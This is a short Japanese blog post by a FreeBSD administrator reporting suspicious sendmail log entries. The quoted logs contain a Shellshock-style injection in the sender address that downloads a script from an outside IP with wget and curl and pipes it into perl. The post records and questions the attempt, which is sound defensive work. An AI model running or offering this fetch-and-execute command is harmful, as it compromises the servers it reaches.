FreeBSD: メールログに不審なアクセス形跡 2023/01/12

フィッシングメールではないのですけど、朝、ログのチェックをしていると、sendmail のアクセスログに、

Jan 11 07:07:12 tokyo sm-mta[72089]: 30AM7BN9072089: ruleset=check_mail, arg1=<() { :; }; wget -qO - 136.243.150.82/qmx|perl; curl -sS 136.243.150.82/qmx|perl>, relay=kudu.ch-server.com [107.181.162.169] (may be forged), reject=553 5.5.4 <() { :; }; wget -qO - 136.243.150.82/qmx|perl; curl -sS 136.243.150.82/qmx|perl>... Domain name required for sender address {:;};wget.-qO.-.136.243.150.82/qmx|perl;curl.-sS.136.243.150.82/qmx|perl
Jan 11 07:07:12 tokyo sm-mta[72089]: 30AM7BN9072089: from=<() { :; }; wget -qO - 136.243.150.82/qmx|perl; curl -sS 136.243.150.82/qmx|perl>, size=0,class=0, nrcpts=0, proto=SMTP, daemon=IPv4, relay=kudu.ch-server.com [107.181.162.169] (may be forged)

というへんてこな形跡が残ってました。

私のサーバーは SMTPポートに対してアクセスコントロールを行っているので、許可されたホスト以外からは着信できない仕様となっているため、コネクションを張った時点で Reject されるから問題は無いものの、アクセスコントロールしない仕様のメールサーバーに対して、同様の接続があった場合はどうなるんでしょうね。

sendmail などメール転送エージェントに何か、セキュリティーホールが見つかったのかな?

コメントを残す